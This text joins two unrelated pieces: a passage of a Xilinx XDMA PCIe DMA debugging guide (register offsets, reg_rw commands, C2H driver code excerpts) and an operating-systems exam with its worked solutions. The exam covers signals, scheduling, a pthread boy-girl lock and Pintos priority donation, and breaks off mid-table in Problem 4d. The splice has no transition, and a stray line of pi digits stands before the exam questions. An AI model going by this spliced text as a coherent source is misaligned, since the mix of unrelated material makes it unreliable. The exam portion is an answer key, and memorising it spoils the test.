- Control register (0x0004 for H2C, 0x1004 for C2H)
- Status register (0x0040 for H2C, 0x1040 for C2H)
- Completed descriptor count (0x0048 for H2C, 0x1048 for C2H)
- Interrupt mask
- Interrupt request
To test whether the link is working or not, one could also write and read AXI-Lite Master as shown below:
- `reg_rw /dev/xdma0_user 0x0000 w`: Read
- `reg_rw /dev/xdma0_user 0x0000 w 0x01234567`: Write
**Debug: Status Register**
Table 4 shows the XDMA channel status register. The bits to check in the register are `descriptor_stopped` and `descriptor_completed`. Once a transfer completes normally:
- `busy` should be 0
- `descriptor_stopped` should be 1
- `descriptor_completed` should be 1
Because the status register is cleared on read, the `descriptor_stopped` and `descriptor_completed` bits will no longer be set once the register has been read manually.
Table 4 - XDMA Channel Status Register [Ref: PG195]
Debug: Other Registers
In case of a hang or partial completion:
- Check the CDC (completed descriptor count) Register
- 0x0048 for H2C, 0x1048 for C2H
- Check dmesg to see how many descriptors are generated
- Compare the CDC to the expected descriptor count
If there are no Channel interrupts:
- Check ‘Channel Interrupt Enables Mask’ Register
- 0x0090 for H2C, 0x1090 for C2H
- Check ‘IRQ Block Channel Interrupt Enable Mask’ Register - Offset: 0x2010
- Read ‘IRQ Block Interrupt Pending’ Register - Offset: 0x204C
  - This shows whether there was an interrupt from any DMA channel. If it is not set, there are no interrupts pending from the channel sources
- Read the ‘IRQ Block Channel Interrupt Request’ Register - Offset: 0x2044
- If not set, check the ‘IRQ Block Channel Interrupt Enable Mask’ Register
Figure 14 and Figure 15 show the Status, Control, Completed Descriptor Count registers of the H2C and C2H channels read after running the sample application run_test.sh provided in (Xilinx Answer 65444).
If the terminal freezes while running an application and XDMA_DEBUG was not enabled in the driver, the status registers of the H2C and C2H channels can be read from a parallel terminal. Figure 16 shows a snapshot of H2C0 and C2H0 reads taken while the channel is actually performing a transfer; the BUSY bit (bit 0) of both channels is set to 1.
Debug: Status Ports
The status ports shown in Table 5 can be enabled from the IP configuration GUI. To understand how the bits in these ports are set, run a simulation of the provided example design. Make sure the simulation passes for the selected configuration, and check the control/status registers that do not get the expected values during system validation. For further debug analysis, check the CQ, CC, RQ, RC, and AXI interface signals.
Figure 17 shows a snapshot of an ILA capture while an H2C data transfer is in progress. It shows the h2c_sts busy bit set (bit 0 = 1). Also note that data is being sent out of the internal PCIe hard block on the m_axis_rc interface, as expected.
**Table 5 - XDMA Channel Status Ports [Ref: PG195]**
<table>
<thead>
<tr>
<th>Signal Name</th>
<th>Direction</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>h2c_sts [7:0]</td>
<td>Output</td>
<td>Status bits for each channel.<br>Bit 6: Control register's 'Run' bit (Table 2-40)<br>Bit 5: IRQ event pending<br>Bit 4: Packet Done event (AXI4-Stream)<br>Bit 3: Descriptor Done event. Pulses for one cycle for each descriptor that is completed, regardless of the Descriptor.Complete field<br>Bit 2: Status register Descriptor_completed bit<br>Bit 1: Status register Descriptor_stopped bit<br>Bit 0: Status register Busy bit</td>
</tr>
</tbody>
</table>
Figure 18 shows a snapshot of an ILA capture when C2H data transfer is ongoing. It shows c2h_sts busy bit set (bit 0 = 1). Also, note that data is being input to the internal PCIE hard block on the s_axis_rq interface as expected.
Appendix: Device Driver Source Code Analysis: C2H Transfer
For user reference and illustration purposes, a general analysis of the working mechanism of the C2H path in the device driver source code is provided in this section. The H2C transfer source is similar in principle to the C2H transfer, so details for the H2C transfer are not included. For the latest driver and the corresponding source, refer to (Xilinx Answer 65444).
The driver files for the XDMA IP are:
a. `xdma-core.c`: the main driver source file.
b. `xdma-core.h`: the header file that defines preprocessor switches, the bits of the SGDMA control register, and the bits of the SGDMA descriptor control fields.
A typical C2H flow sequence is as follows:
1. The user program allocates a buffer pointer (based on the size), passes the pointer to the read function with specific device (C2H) and data size.
2. The driver creates descriptors based on transfer length. The following code in the driver does this work.
In `xdma-core.h`, the variables for the descriptor are defined.
```c
struct xdma_desc {
	u32 control;
	u32 bytes;       /* transfer length in bytes */
	u32 src_addr_lo; /* source address (low 32-bit) */
	u32 src_addr_hi; /* source address (high 32-bit) */
	u32 dst_addr_lo; /* destination address (low 32-bit) */
	u32 dst_addr_hi; /* destination address (high 32-bit) */
	u32 next_lo;     /* next desc address (low 32-bit) */
	u32 next_hi;     /* next desc address (high 32-bit) */
};
```
In `xdma-core.c`, the following code creates descriptors based on transfer length.
```c
static void xdma_desc_set(struct xdma_desc *desc, dma_addr_t rc_bus_addr, u64 ep_addr, int len, int dir_to_dev)
{
#if SD_ACCEL
/* length (in bytes) must be a non-negative multiple of four */
BUG_ON(len & 3);
#endif
/* transfer length */
desc->bytes = cpu_to_le32(len);
if (dir_to_dev) {
/* read from root complex memory (source address) */
desc->src_addr_lo = cpu_to_le32(PCI_DMA_L(rc_bus_addr));
desc->src_addr_hi = cpu_to_le32(PCI_DMA_H(rc_bus_addr));
/* write to end point address (destination address) */
desc->dst_addr_lo = cpu_to_le32(PCI_DMA_L(ep_addr));
desc->dst_addr_hi = cpu_to_le32(PCI_DMA_H(ep_addr));
} else {
/* read from end point address (source address) */
desc->src_addr_lo = cpu_to_le32(PCI_DMA_L(ep_addr));
desc->src_addr_hi = cpu_to_le32(PCI_DMA_H(ep_addr));
/* write to root complex memory (destination address) */
desc->dst_addr_lo = cpu_to_le32(PCI_DMA_L(rc_bus_addr));
desc->dst_addr_hi = cpu_to_le32(PCI_DMA_H(rc_bus_addr));
}
}
```
The above function is called in `transfer_build()`.
```c
static int transfer_build(struct xdma_transfer *transfer, u64 ep_addr,
int dir_to_dev, int non_incr_addr, int force_new_desc,
int userspace)
{
...........................................
...........................................
xdma_desc_set(transfer->desc_virt + j, cont_addr,
ep_addr, cont_len, dir_to_dev);
...........................................
...........................................
xdma_desc_set(transfer->desc_virt + j, cont_addr, ep_addr, cont_len,
dir_to_dev);
...........................................
...........................................
...........................................
return j;
}
```
The driver writes the next adjacent descriptor count to 0x5088, if any.
```c
static void xdma_desc_adjacent(struct xdma_desc *desc, int next_adjacent)
{
int extra_adj = 0;
/* remember reserved and control bits */
u32 control = le32_to_cpu(desc->control) & 0x0000f0ffUL;
u32 max_adj_4k = 0;
	if (next_adjacent > 0) {
		extra_adj = next_adjacent - 1;
		if (extra_adj > MAX_EXTRA_ADJ) {
			extra_adj = MAX_EXTRA_ADJ;
		}
		max_adj_4k = (0x1000 - ((le32_to_cpu(desc->next_lo)) & 0xFFF)) / 32 - 1;
		if (extra_adj > max_adj_4k) {
			extra_adj = max_adj_4k;
		}
		if (extra_adj < 0) {
			printk("Warning: extra_adj<0, converting it to 0\n");
			extra_adj = 0;
		}
	}
	/* merge adjacent and control field */
	control |= 0xAD4B0000UL | (extra_adj << 8);
	/* write control and next_adjacent */
	desc->control = cpu_to_le32(control);
}
```
The above function is called in the `transfer_create()` function.
```c
static struct xdma_transfer *transfer_create(struct xdma_dev *lro,
	const char *start, size_t cnt, u64 ep_addr, int dir_to_dev,
	int non_incr_addr, int force_new_desc, int userspace)
{
	...........................................
	...........................................
	/* fill in adjacent numbers */
	for (i = 0; i < transfer->desc_num; i++) {
		xdma_desc_adjacent(transfer->desc_virt + i,
			transfer->desc_num - i - 1);
	}
	/* initialize wait queue */
	init_waitqueue_head(&transfer->wq);
	return transfer;
}
```
The driver starts a C2H transfer by writing to the C2H engine control register address 0x1004.
In `xdma-core.h`, the engine control register is defined as follows:
```c
struct engine_regs {
	u32 identifier;
	u32 control; /* channel control register (offset 0x04; 0x1004 for C2H) */
	u32 control_w1s;
	u32 control_w1c;
	u32 reserved_1[12]; /* padding */
	u32 status;
	u32 status_rc;
	u32 completed_desc_count;
	u32 alignments;
	u32 reserved_2[14]; /* padding */
	u32 poll_mode_wb_lo;
	u32 poll_mode_wb_hi;
	u32 interrupt_enable_mask;
	u32 interrupt_enable_mask_w1s;
	u32 interrupt_enable_mask_w1c;
	u32 reserved_3[9]; /* padding */
	u32 perf_ctrl;
	u32 perf_cyc_lo;
	u32 perf_cyc_hi;
	u32 perf_dat_lo;
	u32 perf_dat_hi;
	u32 perf_pnd_lo;
	u32 perf_pnd_hi;
} __packed;
```
The following code in `xdma-core.c` writes to the control register of the C2H engine.
```c
static void engine_start_mode_config(struct xdma_engine *engine) {
/* write control register of SG DMA engine */
u32 w = (u32)XDMA_CTRL_RUN_STOP;
w |= (u32)XDMA_CTRL_IE_READ_ERROR;
w |= (u32)XDMA_CTRL_IE_DESC_ERROR;
w |= (u32)XDMA_CTRL_IE_DESC_ALIGN_MISMATCH;
w |= (u32)XDMA_CTRL_IE_MAGIC_STOPPED;
if (poll_mode) {
w |= (u32)XDMA_CTRL_POLL_MODE_WB;
} else {
w |= (u32)XDMA_CTRL_IE_DESC_STOPPED;
w |= (u32)XDMA_CTRL_IE_DESC_COMPLETED;
/* enable IE_IDLE_STOP only for AXI ST C2H and for perf test */
if (engine->streaming && !engine->dir_to_dev) {
w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
}
if (engine->xdma_perf) {
w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
}
	}
	/* write the assembled control word to start the engine */
	write_register(w, &engine->regs->control);
}
```
The engine is started by `engine_start()`; its body (elided here) programs the descriptor registers and sets the control register via `engine_start_mode_config()`:
```c
static struct xdma_transfer *engine_start(struct xdma_engine *engine)
{
	...........................................
	/* configure the engine and set the control register to start it */
	engine_start_mode_config(engine);
	...........................................
}
```
After the hardware sends an interrupt to the host, the driver acts again. It reads 'IRQ Block Channel Interrupt Request' 0x2044 to see which channel sent the interrupt.
```c
static irqreturn_t xdma_isr(int irq, void *dev_id) {
/* iterate over C2H (PCIe write) */
for (channel = 0; channel < XDMA_CHANNEL_NUM_MAX; channel++) {
engine = lro->engine[channel][1];
/* engine present and its interrupt fired? */
if (engine && (engine->irq_bitmask & ch_irq)) {
dbg_tfr("schedule_work(engine=%p)\n", engine);
schedule_work(&engine->work);
}
}
}
```
Disable channel interrupt by writing to 0x2018 as needed.
```c
/* channel_interrupts_disable -- Disable interrupts we are not interested in */
static void channel_interrupts_disable(struct xdma_dev *lro, u32 mask)
{
struct interrupt_regs *reg = (struct interrupt_regs *)
(lro->bar[lro->config_bar_idx] + XDMA_OFS_INT_CTRL);
write_register(mask, &reg->channel_int_enable_w1c);
}
```
The Driver reads the corresponding 'Status Register' 0x1044 which will also clear the status register.
```c
static int engine_service(struct xdma_engine *engine, int desc_writeback)
{
............................................................
............................................................
/* Service the engine */
if (!engine->running) {
dbg_tfr("Engine was not running!!! Clearing status\n");
if (desc_writeback == 0)
engine_status_read(engine, 1);
return 0;
}
............................................................
............................................................
return rc;
}
```
The `engine_status_read` function is defined as follows.
```c
static u32 engine_status_read(struct xdma_engine *engine, int clear)
{
u32 value;
BUG_ON(!engine);
engine_reg_dump(engine);
/* read status register */
dbg_tfr("Status of SG DMA %s engine:\n", engine->name);
dbg_tfr("ioread32(0x%p):\n", &engine->regs->status);
if (clear) {
value = engine->status =
read_register(&engine->regs->status_rc);
} else {
value = engine->status = read_register(&engine->regs->status);
}
dbg_tfr("status = 0x%08x: %s%s%s%s%s%s%s\n", (u32)engine->status,
(value & XDMA_STAT_BUSY) ? "BUSY " : "IDLE ",
(value & XDMA_STAT_DESC_STOPPED) ? "DESC_STOPPED " : "",
(value & XDMA_STAT_DESC_COMPLETED) ? "DESC_COMPLETED " : "",
(value & XDMA_STAT_ALIGN_MISMATCH) ? "ALIGN_MISMATCH " : "",
(value & XDMA_STAT_MAGIC_STOPPED) ? "MAGIC_STOPPED " : "",
		(value & XDMA_STAT_FETCH_STOPPED) ? "FETCH_STOPPED " : "");
	return value;
}
```
The code reads the channel 'Completed descriptor count' register at 0x1048.
```c
if (desc_count == 0)
desc_count = read_register(&engine->regs->completed_desc_count);
```
The completed descriptor count register is defined in the `xdma-core.h` file as shown below.
```c
struct engine_regs {
u32 identifier;
u32 control;
u32 control_w1s;
u32 control_w1c;
u32 reserved_1[12]; /* padding */
u32 status;
u32 status_rc;
u32 completed_desc_count;
u32 alignments;
u32 reserved_2[14]; /* padding */
u32 poll_mode_wb_lo;
u32 poll_mode_wb_hi;
u32 interrupt_enable_mask;
u32 interrupt_enable_mask_w1s;
u32 interrupt_enable_mask_w1c;
u32 reserved_3[9]; /* padding */
u32 perf_ctrl;
u32 perf_cyc_lo;
u32 perf_cyc_hi;
u32 perf_dat_lo;
u32 perf_dat_hi;
u32 perf_pnd_lo;
u32 perf_pnd_hi;
} __packed;
```
The code below shows a write to the 'Channel Control Register' at 0x1004 to stop DMA run.
```c
/**
* xdma_engine_stop() - stop an SG DMA engine
*/
static void xdma_engine_stop(struct xdma_engine *engine)
{
u32 w;
BUG_ON(!engine);
dbg_tfr("xdma_engine_stop(engine=%p)\n", engine);
w = 0;
w |= (u32)XDMA_CTRL_IE_DESC_ALIGN_MISMATCH;
	w |= (u32)XDMA_CTRL_IE_MAGIC_STOPPED;
	w |= (u32)XDMA_CTRL_IE_READ_ERROR;
	w |= (u32)XDMA_CTRL_IE_DESC_ERROR;
	if (poll_mode) {
		w |= (u32)XDMA_CTRL_POLL_MODE_WB;
	} else {
		w |= (u32)XDMA_CTRL_IE_DESC_STOPPED;
		w |= (u32)XDMA_CTRL_IE_DESC_COMPLETED;
		/* Disable IDLE STOPPED for MM */
		if ((engine->streaming && (engine->dir_to_dev == 0)) ||
			(engine->xdma_perf))
			w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
	}
	dbg_tfr("Stopping SG DMA %s engine; writing 0x%08x to 0x%p.\n",
		engine->name, w, (u32 *)&engine->regs->control);
	write_register(w, &engine->regs->control);
	/* dummy read of status register to flush all previous writes */
	dbg_tfr("xdma_engine_stop(%s) done\n", engine->name);
}
```
Write to the 'Block channel interrupt Enable Mask' 0x2014 to enable interrupts for the next transfer.
```c
/* channel_interrupts_enable -- Enable interrupts we are interested in */
static void channel_interrupts_enable(struct xdma_dev *lro, u32 mask)
{
	struct interrupt_regs *reg = (struct interrupt_regs *)
		(lro->bar[lro->config_bar_idx] + XDMA_OFS_INT_CTRL);
	write_register(mask, &reg->channel_int_enable_w1s);
}
```
Control is returned to the application program with the transfer size. When the driver module is unloaded, the exit routine below cleans up.
```c
static void __exit xdma_exit(void)
{
	dbg_init(DRV_NAME " exit()\n");
	/* unregister this driver from the PCI bus driver */
	pci_unregister_driver(&pci_driver);
	if (g_xdma_class)
		class_destroy(g_xdma_class);
}

module_init(xdma_init);
module_exit(xdma_exit);
```
References
- (PG195): DMA/Bridge Subsystem for PCI Express v4.1
- (Xilinx Answer 65444): Xilinx PCI Express Drivers and Software Guide
General Information:
This is a \textbf{closed book} exam. You are allowed 1 page of \textbf{hand-written} notes (both sides). You
have 3 hours to complete as much of the exam as possible. Make sure to read all of the questions
first, as some of the questions are substantially more time consuming.
Write all of your answers directly on this paper. \textit{Make your answers as concise as possible}. On
programming questions, we will be looking for performance as well as correctness, so think through
your answers carefully. If there is something about the questions that you believe is open to
interpretation, please ask us about it!
\begin{tabular}{|c|c|c|}
\hline
\textbf{Problem} & \textbf{Possible} & \textbf{Score} \\
\hline
1 & 18 & \\
\hline
2 & 18 & \\
\hline
3 & 20 & \\
\hline
4 & 24 & \\
\hline
5 & 20 & \\
\hline
\hline
\textbf{Total} & \textbf{100} & \\
\hline
\end{tabular}
3.141592653589793238462643383279502884197169399375105820974944
Problem 1: TRUE/FALSE [18 pts]
In the following, it is important that you EXPLAIN your answer in TWO SENTENCES OR LESS (Answers longer than this may not get credit!). Also, answers without an explanation GET NO CREDIT.
Problem 1a[2pts]: When you type Ctrl+C to quit a program in your terminal, you are actually sending a SIGINT signal to the program, which makes it quit.
True / False
Explain: SIGINT is the vehicle for conveying a Ctrl-C request from the terminal to the program. Assuming the SIGINT handler has not been redirected, this will cause the program to quit. Note: we would also accept "False" if you explain that the SIGINT handler might have been redirected.
Problem 1b[2pts]: The function pthread_intr_disable() is a crude but viable way for user programs to implement an atomic section.
True / False
Explain: This function does not exist, and you cannot disable interrupts at user level in any case. A similarly-named routine (pthread_setintr()) simply disables the delivery of signals; it does not prevent multiple threads from executing concurrently, so it could not be used to implement a critical section.
Problem 1c[2pts]: If the banker's algorithm finds that it's safe to allocate a resource to an existing thread, then all threads will eventually complete.
True / False
Explain: When the banker's algorithm finds that it's safe to allocate a resource, this simply means that threads could complete from a resource allocation standpoint. However, threads could still go into an infinite loop or otherwise fail to complete.
Problem 1d[2pts]: The lottery scheduler can be utilized to implement strict priority scheduling.
True / False
Explain: Strict priority scheduling would require the ability to have high-priority threads that receive all CPU time – at the expense of lower priority threads. The lottery scheduler will give some CPU time to every thread (except those which have zero tokens).
Problem 1e[2pts]: Locks can be implemented using semaphores.
True / False
Explain: Initializing a semaphore with the value “1” will cause it to behave like a lock. Sema.P() ⇒ acquire() and Sema.V() ⇒ release().
Problem 1f[2pts]: Two processes can share information by reading and writing from a shared linked list.
True / False
Explain: If a shared page is mapped into the same place in the address space of two processes, then they can share data structures that utilize pointers as long as they are stored in the shared page and pointers are to structures in the shared page.
Problem 1g[2pts]: In Pintos, a kernel-level stack can grow as large as it needs to be to perform its functions.
True / False
Explain: Stacks in the Pintos kernel must fit entirely into a 4K page. In fact, they share the 4K page with the corresponding Thread Control Block (TCB).
Problem 1h[2pts]: Suppose that a shell program wants to execute another program and wait on its result. It does this by creating a thread, calling exec from within that thread, then waiting in the original thread.
True / False
Explain: The shell program must create a new process (not thread!) before calling exec(); otherwise, the exec() call will terminate the existing process and start a new process – effectively terminating the shell.
Problem 1i[2pts]: A network server in Linux works by calling bind() on a socket, and then calling listen() on the socket in a loop to wait for new clients.
True / False
Explain: The server calls listen() only once, then accept() multiple times in a loop.
Problem 2: Short Answer [18pts]
Problem 2a[2pts]: How does a modern OS regain control of the CPU from a program stuck in an infinite loop?
Assuming that we are talking about a user-level program (or a kernel thread with interrupts enabled), the timer interrupt handler (triggered by the timer) will enter the scheduler and recover the CPU from a program that is stuck in an infinite loop.
Problem 2b[2pts]: Is it possible for an interrupt handler (code triggered by a hardware interrupt) to sleep while waiting for another event? If so, explain how. If not, explain why not.
There are actually two possible answers to this question. (1) “NO”: Strictly speaking, an interrupt handler must not sleep while waiting for another event, since it doesn’t have a thread-control block (context) to put onto a wait queue and is operating with interrupts disabled. However, one could also answer (2) “YES”: an interrupt handler that wants to sleep must allocate a new kernel thread to finish its work, place the thread on a wait queue, then return from the interrupt (reenabling interrupts in the process).
Problem 2c[2pts]: Why is it important for system calls to be vectored through the syscall table (indexed by an integer syscall number) rather than allowing the user to specify a function address to be called by the kernel after it transitions to kernel mode?
If the user were able to specify an arbitrary address for execution in the kernel, then they could bypass checking and find many ways to violate protection. Consequently, the user must specify a syscall number during the execution of a system call. The hardware then atomically raises the hardware level to “kernel level” while executing the system call from the specified entry point.
Problem 2d[3pts]: Name two advantages and one disadvantage of implementing a threading package at user level (e.g. “green threads”) rather than relying on thread scheduling from within the kernel.
Advantages include: very fast context switch (all at user level, no system call), very low overhead thread fork, and user-configurable scheduling. One very important disadvantage is the fact that all threads will get put to sleep when any one thread enters into the kernel and blocks on I/O.
Problem 2e[2pts]: List two reasons why overuse of threads is bad (i.e. using too many threads for different tasks). Be explicit in your answers.
There are a number of possible answers: (1) Too many threads scheduled simultaneously can lead to excessive context switch overhead. (2) Too many threads can lead to memory overutilization. (3) Too many threads can cause excessive synchronization overhead (many locks to handle all the parallelism).
Problem 2f[2pts]: What was the problem with the Therac-25? Your answer should involve one of the topics of the class.
The Therac-25 had a number of synchronization problems, including improper synchronization between the operator console and the turntable mechanism which caused patients to receive the wrong type and dosage of radiation.
Problem 2g[2pts]: Why is it possible for a web browser (such as Firefox) to have 2 different tabs opened to the same website (at the same remote IP address and port) without mixing up content directed at each tab?
Because a unique TCP/IP connection consists of a 5-tuple, namely [source IP, source Port, destination IP, destination Port, and protocol] (where the protocol is “6” for TCP/IP – which you didn’t need to know). Consequently, although the web browser might have many connections with the same source IP address, destination IP address and destination Port, they will all have unique source ports, allowing them to be unique.
Problem 2h[3pts]: What are some of the hardware differences between kernel mode and user mode? Name at least three.
There are a number of differences: (1) There is at least one status bit (the “kernel mode bit”) which changes between kernel mode and user mode. In an x86 processor, there are 2 bits which change (since there are 4 modes). (2) Additional kernel-mode instructions are available (such as those that modify the page table registers, those that enable and disable interrupts, etc). (3) Pages marked as kernel-mode in their PTEs are only accessible in kernel mode. (4) Controls for I/O devices (such as the timer, interrupt controllers, and device controllers) are typically only accessible from kernel mode.
Problem 3: Boy-Girl Lock [20pts]
A boy-girl lock is a sort of generalized reader-writer lock: in a reader-writer lock there can be any number of readers or a single writer (but not both readers and writers at the same time), while in a boy-girl lock there can be any number of boys or any number of girls (but not both a boy and a girl at the same time). Assume that we are going to implement this lock at user level utilizing pThread monitors (i.e., pThread mutexes and condition variables). Note that the assumption here is that we will put threads to sleep when they attempt to acquire the lock as a Boy while it is already held by one or more Girls, and vice-versa. You must implement the behavior using condition variable(s). Points will be deducted for any spin-waiting behavior.
Some snippets from POSIX Thread manual pages showing function signatures are shown at end of this problem. They may or may not be useful.
Our first take at this lock is going to utilize the following structure and enumeration type:
```c
/* The basic structure of a boy-girl lock */
struct bglock {
pthread_mutex_t lock;
pthread_cond_t wait_var;
// Simple state variable
int state;
};
/* Enumeration to indicate type of requested lock */
enum bglock_type {
BGLOCK_BOY = 0,
BGLOCK_GIRL = 1
};
/* interface functions: return 0 on success, error code on failure */
int bglock_init(struct bglock *lock);
int bglock_lock(struct bglock *lock, enum bglock_type type);
int bglock_unlock(struct bglock *lock);
```
Note that the lock requestor specifies the type of lock that they want at the time that they make the request:
```c
/* Request a Boy lock */
if (bglock_lock(mylock, BGLOCK_BOY)) {
printf("Lock request failed!");
exit(1);
}
/* . . . Code using lock . . . */
/* Release your lock */
bglock_unlock(mylock);
```
Problem 3a[3pts]: Complete the following sketch for the initialization function. Note that initialization should return zero on success and a non-zero error code on failure (e.g. return the failure code, if you encounter one, from the various synchronization functions). Hint: the state of the lock is more than just “acquired” or “free”.
```c
/* Initialize the BG lock.
* Args: pointer to a bglock
* Returns: 0 (success)
* non-zero (errno code from synchronization functions)
*/
int bglock_init(struct bglock *lock) {
int result;
lock->state = 0; // No lock holders of any type
if ((result = pthread_mutex_init(&(lock->lock), NULL)))
return result; // Error
result = pthread_cond_init(&(lock->wait_var), NULL);
return result;
}
```
Problem 3b[5pts]: Complete the following sketch for the lock function. Think carefully about the state of the lock; when you should wait, when you can grab the lock.
```c
/* Grab a BG lock.
* Args: (pointer to a bglock, enum lock type)
* Returns: 0 (lock acquired)
* non-zero (errno code from synchronization functions)
*/
int bglock_lock(struct bglock *lock, enum bglock_type type) {
int dir = (type == BGLOCK_BOY)?1:-1; // Direction
int result;
// Grab monitor lock
if ((result = pthread_mutex_lock(&(lock->lock))))
return result; // error
while (lock->state * dir < 0) {
// Incompatible threads already have bglock, must sleep
if ((result = pthread_cond_wait(&(lock->wait_var), &(lock->lock))))
return result; // error
}
lock->state += dir; // register new bglock holder of this type
// Release monitor lock
result = pthread_mutex_unlock(&(lock->lock));
return result;
}
```
**Problem 3c[5pts]:** Complete the following sketch for the unlock function.
```c
/* Release a BG lock.
 * Args: pointer to a bglock
 * Returns: 0 (success)
 *          non-zero (errno code from synchronization functions)
 */
int bglock_unlock(struct bglock *lock) {
int result;
// Grab monitor lock
if ((result = pthread_mutex_lock(&(lock->lock))))
return result; // error
// one less bglock holder of this type
lock->state -= (lock->state > 0)?1:-1; // Direction
// If returning to neutral status, signal any waiters
if (lock->state == 0)
if ((result = pthread_cond_broadcast(&(lock->wait_var))))
return result; // error
// Release monitor lock
result = pthread_mutex_unlock(&(lock->lock));
return result;
}
```
**Problem 3d[2pts]:** Consider a group of “nearly” simultaneous arrivals (i.e. they arrive in a period much quicker than the time for any one thread that has successfully acquired the BGlock to get around to performing bglock_unlock()). Assume that they enter the bglock_lock() routine in this order:
B1, B2, G1, G2, B3, G3, B4, B5, B6, B7
How will they be grouped? (Place braces, namely “{” around requests that will hold the lock simultaneously). This simple lock implementation (with a single state variable) is subject to starvation. Explain.
All of the boy requests will go first, followed by girl requests:
{ B1, B2, B3, B4, B5, B6, B7 }, { G1, G2, G3 }
This implementation experiences starvation because a series of waiting girl lock requests could be arbitrarily held off if there is a stream of boy requests (and vice-versa).
Problem 3e[5pts]: Suppose that we want to enforce fairness, such that Boy and Girl requests are divided into phases based on arrival time into the `bglock_lock()` routine. Thus, for instance, an arrival stream of Boys and Girls such as this:
\[B_1, B_2, G_1, G_2, G_3, G_4, B_3, G_5, B_4, B_5\]
will get granted in groups such as this:
\[
\{B_1, B_2\}, \{G_1, G_2, G_3, G_4\}, \{B_3\}, \{G_5\}, \{B_4, B_5\}
\]
Explain what the minimum changes are that you would need to make to the `bglock` structure to meet these requirements and sketch out what you would do during `bglock_init()` and `bglock_lock()` and `bglock_unlock()` routines. You do not need to write actual code, but should be explicit about what your `bglock` structure would look like and how you would use its fields to accomplish the desired behavior.
Here, we number phases starting from zero (with wraparound). We expand our state variable to a queue of state variables. Each incoming thread figures out which phase it is in and then optionally sleeps (if it is not in the current phase). Our new `bglock` looks like this:
```c
struct bglock {
pthread_mutex_t lock;
pthread_cond_t wait_var;
int headphase, tailphase;
int state[MAX_PHASES+1];
};
```
`bglock_init()`: initialize lock and wait_var; headphase=0; tailphase=0; state[x]=0 for all x;
`bglock_lock()`: if state[tailphase] doesn’t match the request, increment tailphase (with wrapping – may have to sleep if there are already MAX_PHASES phases). In either case, increment state[tailphase] in the correct direction (+1 or -1) depending on the desired type of lock. Save the current tailphase as your phase. Then, wait on the condition variable until headphase == your saved phase.
`bglock_unlock()`: Decrement state[headphase] in correct direction (-1 or +1) depending on desired type of lock. If state[headphase]==0, check to see if headphase!=tailphase. If so, headphase++, broadcast to wake up everyone on condition variable.
Note that you can optimize wakeup behavior by adding a queue of condition variables as well, although this will increase the amount of state in the bglock.
Assorted POSIX Thread Manual Snippets for Problem 3
PTHREAD_MUTEX_DESTROY(3P): initialization/destruction of mutexes
```c
int pthread_mutex_destroy(pthread_mutex_t *mutex);
int pthread_mutex_init(pthread_mutex_t *restrict mutex,
const pthread_mutexattr_t *restrict attr);
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
```
PTHREAD_MUTEX_LOCK(3P): use of mutex
```c
int pthread_mutex_lock(pthread_mutex_t *mutex);
int pthread_mutex_trylock(pthread_mutex_t *mutex);
int pthread_mutex_unlock(pthread_mutex_t *mutex);
```
PTHREAD_COND_DESTROY(3P): initialization/destruction of condition variables
```c
int pthread_cond_destroy(pthread_cond_t *cond);
int pthread_cond_init(pthread_cond_t *restrict cond,
const pthread_condattr_t *restrict attr);
pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
```
PTHREAD_COND_TIMEDWAIT(3P): sleeping on condition variables
```c
int pthread_cond_timedwait(pthread_cond_t *restrict cond,
pthread_mutex_t *restrict mutex,
const struct timespec *restrict abstime);
int pthread_cond_wait(pthread_cond_t *restrict cond,
pthread_mutex_t *restrict mutex);
```
PTHREAD_COND_BROADCAST(3P): signaling of threads waiting on condition variables
```c
int pthread_cond_broadcast(pthread_cond_t *cond);
int pthread_cond_signal(pthread_cond_t *cond);
```
Problem 4: Scheduling and Deadlock [24 pts]
Problem 4a[3pts]: What is priority inversion and why is it an important problem? Present a priority inversion scenario in which a lower priority process can prevent a higher-priority process from running (assume that there is no priority donation mechanism):
Priority inversion is a situation in which a lower-priority task is allowed to run over a higher-priority task. Consider three tasks in priority order: T1, T2, and T3 (i.e. T1 is lowest, T3 is highest). Suppose that T1 grabs a lock, T2 starts running, then T3 tries to grab the lock (and sleeps). Here, T2 is effectively preventing T3 from running (since T2 is preventing T1 from running, which is preventing T3 from running). The result is priority inversion.
Problem 4b[3pts]: How does the Linux CFS (“Completely Fair Scheduler”) scheduler decide which thread to run next? What aspect of its behavior is “fair”? (You can ignore the presence of priorities or “nice” values in your answer):
The Linux CFS scheduler computes something called “virtual time” which is a scaled version of real CPU time. The scheduler attempts to make sure that every thread has an equal amount of virtual time. Thus, to decide which thread to run next, it simply picks the thread with the least amount of accumulated virtual time. This behavior is considered “fair” because it attempts to distribute the same total virtual time to every thread.
```c
void main (void) {
1 thread_set_priority(10);
2 struct lock a, b, c;
3 lock_init(&a);
4 lock_init(&b);
5 lock_init(&c);
6 lock_acquire(&a);
7 lock_acquire(&b);
8 lock_acquire(&c);
9 printf("1");
10 thread_create("a",15,func,&a);
11 printf("6");
12 thread_create("b",20,func,&b);
13 printf("2");
14 thread_create("c",25,func,&c);
15 lock_release(&c);
16 lock_release(&a);
17 lock_release(&b);
18 printf("!");
}
void func(void* lock_) {
19 struct lock *lock = lock_;
20 lock_acquire(lock);
21 lock_release(lock);
22 printf("%s",thread_current()->name);
23 thread_exit();
}
```
Problem 4c[2pts]: Consider the above PintOS test that exercises your priority scheduler. Assume that no priority donation has been implemented. What does it output to the terminal? Is the output affected by priorities in any way? Explain.
This code will output “162cab!”. This result is not affected by priorities (as long as all threads running “func()” are higher priority than “main()”), since high-priority threads go to sleep almost immediately after they start and are released in order by lines #15, #16, and #17.
**Problem 4d [5pts]:** Next, assume that the code from (4c) is executed utilizing priority donation. Fill in the following table to detail execution. This table includes 7 columns as following:
1) The current executing thread
2) Which line this thread was executing when it yielded
3) To which thread it yielded
4-7) The priorities of each thread (N/A if a thread is not created or has exited)
<table>
<thead>
<tr>
<th>thread_current()</th>
<th>Line at which yielded</th>
<th>Thread which it yielded to</th>
<th>Main</th>
<th>a</th>
<th>b</th>
<th>c</th>
</tr>
</thead>
<tbody>
<tr>
<td>main</td>
<td>10</td>
<td>a</td>
<td>10</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>a</td>
<td>20</td>
